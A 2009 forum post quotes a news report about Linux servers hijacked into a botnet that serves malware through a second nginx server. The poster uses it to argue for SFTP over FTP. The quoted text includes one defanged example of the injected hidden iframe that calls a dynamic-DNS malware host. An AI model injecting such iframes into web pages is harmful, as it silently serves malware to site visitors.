09-17-2009, 11:20 AM
|
|
|
Totally Borked
Industry Role:
Join Date: Feb 2005
Posts: 6,284
|
and another reason to not use ftp, but sftp....
Quote:
A security researcher has discovered a cluster of infected Linux servers that have been corralled into a special ops botnet of sorts and used to distribute malware to unwitting people browsing the web.
Each of the infected machines examined so far is a dedicated or virtual dedicated server running a legitimate website, Denis Sinegubko, an independent researcher based in Magnitogorsk, Russia, told The Register. But in addition to running an Apache webserver to dish up benign content, they've also been hacked to run a second webserver known as nginx, which serves malware.
...
The infected machines observed by Sinegubko serve legitimate traffic on port 80, the standard TCP port used by websites. Behind the scenes, the rogue server sends malicious traffic over port 8080. The malicious payloads are then delivered with the help of dynamic DNS hosting providers, which offer free domain names that are mapped to the IP address of the zombie webserver.
The links look something like this:
Code:
<i_frame src="http ://a86x . homeunix . org:8080/ts/in.cgi?open2" width=997 height=0 style="visibility: hidden"></iframe>
They are injected into legitimate websites, so that they are surreptitiously served when users browse the infected page.
It's unclear exactly how the servers have become infected. Sinegubko speculates they belong to careless administrators who allowed their root passwords to be sniffed. Indeed, the part of the multi-staged attack that plants malicious iframes into legitimate webpages uses FTP passwords that have been stolen using password sniffers. It's likely the zombie servers were compromised in the same fashion, he explained.
|
__________________
For coding work - hit me up on andy // borkedcoder // com
(consider figuring out the email as test #1)
All models are wrong, but some are useful. George E.P. Box. p202
|
|
|